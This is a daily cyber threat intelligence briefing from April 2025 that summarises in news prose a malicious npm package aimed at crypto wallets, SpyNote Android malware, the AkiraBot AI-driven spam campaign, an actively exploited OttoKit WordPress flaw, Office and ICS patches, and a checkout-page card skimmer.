Cyware Daily Threat Intelligence, April 11, 2025

shutterstock 1621717168 (1)

Daily Threat Briefing April 11, 2025

Bots don’t sleep and AkiraBot proves it. Since late 2024, this spam operation has flooded over 400,000 websites, zeroing in on small businesses using platforms like Shopify, Wix, and Squarespace. The messages push shady SEO services, powered by AI-generated content to dodge filters. With rotating domains, CAPTCHA bypass tools, and an expanding reach into live chats and comment sections, AkiraBot is becoming harder to pin down.

One bug, admin access - just like that. A critical flaw in the OttoKit WordPress plugin is being actively exploited, allowing attackers to create admin accounts and take over sites. Only some configurations are vulnerable, but where it hits, it hits hard.

When a checkout page starts asking for your card details twice, something’s wrong. A WordPress site was found hosting a fake credit card form. The malicious script captured payment info and funneled it to a freshly registered domain, designed to look harmless, but built to steal.

Top Malware Reported in the Last 24 Hours

Malicious npm package targets Exodus and Atomic

ReversingLabs discovered a malicious npm package, pdf-to-office, that targets Atomic and Exodus crypto wallet users. This package, which appears to convert PDF files to Microsoft Office documents, actually deploys a malicious payload that modifies key files within the wallet software. This allows attackers to intercept cryptocurrency transfers by silently swapping recipient wallet addresses. The malware remains persistent even after the removal of the package, requiring a complete reinstallation of the affected wallet software.

Newly registered domains drop SpyNote

Cybersecurity researchers have discovered that threat actors are creating deceptive websites to spread the SpyNote Android malware. These websites pretend to be Google Play Store pages for popular apps, tricking users into downloading the malware. The malware, also known as SpyMax, steals sensitive data from infected devices and has been linked to a Chinese-speaking threat actor named GoldFactory. It has also been adopted by state-sponsored hacking groups. The malware has been found to be spread through carousel images that download a malicious APK file onto the user's device.

AkiraBot evades CAPTCHA in new spam campaign

A massive new spam campaign by AkiraBot has been discovered. This campaign has targeted over 400,000 websites, with a focus on SME businesses hosted on platforms like Shopify, Wix, and Squarespace. The spam messages promote suspicious SEO services called Akira and ServiceWrap. The campaign uses content generated by an OpenAI LLM, which helps it evade spam filters as the content is unique each time. The framework also rotates the attacker-controlled domains mentioned in the messages, further complicating spam filtering. Since September 2024, AkiraBot has successfully spammed 80,000 websites. It has evolved to target live chat widgets and comments sections, and uses CAPTCHA bypass services and multiple proxy hosts to avoid detection. 

Top Vulnerabilities Reported in the Last 24 Hours

OttoKit plugin flaw actively exploited

A high-severity security vulnerability (CVE-2025-3102) in the OttoKit (formerly SureTriggers) plugin for WordPress has been actively exploited within hours of its public disclosure. The authorization bypass bug allows attackers to create administrator accounts under certain conditions and take control of vulnerable websites. The flaw was addressed in version 1.0.79. Successful exploitation could lead to complete site control, unauthorized plugin uploads, malware, spam, and redirection to malicious websites. Although the plugin has over 100,000 active installations, only a subset of websites is exploitable. 

Microsoft issues emergency fix

Microsoft has released an urgent patch, KB5002623, for Office 2016 to fix a critical issue causing applications like Word, Excel, and Outlook to crash. This issue was introduced by a previous update, KB5002700, and affects the Microsoft Installer (.msi) version of Office 2016, not the Click-to-Run editions. Users are advised to install both updates to resolve the problem. The patch is available for manual download from the Microsoft Download Center, with separate files for 32-bit and 64-bit systems. Microsoft assures users that the update is safe and has been scanned for viruses. If users encounter issues after installation, they can uninstall the update through the Control Panel. Microsoft encourages all Office 2016 users to install these updates promptly to ensure a stable experience.

Critical bugs in several ICS devices

Multiple ICS devices from Rockwell Automation, Hitachi Energy, and Inaba Denki Sangyo have critical vulnerabilities with severity ratings up to 9.9 on the CVSS base score. Cyble has urged users to patch these vulnerabilities, which affect products like Rockwell Automation Industrial Data Center, Hitachi Energy MicroSCADA Pro/X SYS600, and Inaba Denki Sangyo CHOCO TEI WATCHER mini-industrial cameras. The identified vulnerabilities include CVE-2025-23120, CVE-2025-25211, CVE-2025-26689, CVE-2024-4872, and CVE-2024-3980, with potential risks ranging from remote code execution and unauthorized access to data tampering and session hijacking. 

Top Scams Reported in the Last 24 Hours

Fake font domains facilitate card theft

A Sucuri client's WordPress site was found to have a suspicious credit card form and an unfamiliar domain, italicfonts[.]org, on the checkout page. Upon investigation, a heavily obfuscated script was found in the theme's footer.php file, which contained the suspicious domain and elements of a credit card form. The malware worked by injecting a script into the checkout page, creating a fake credit card form, capturing credit card details, and sending them to the attacker's server. The domain was registered recently, had no indexed results, and was found within a fake credit card form. The fake form was designed to mimic real payment fields to avoid detection.

Related Threat Briefings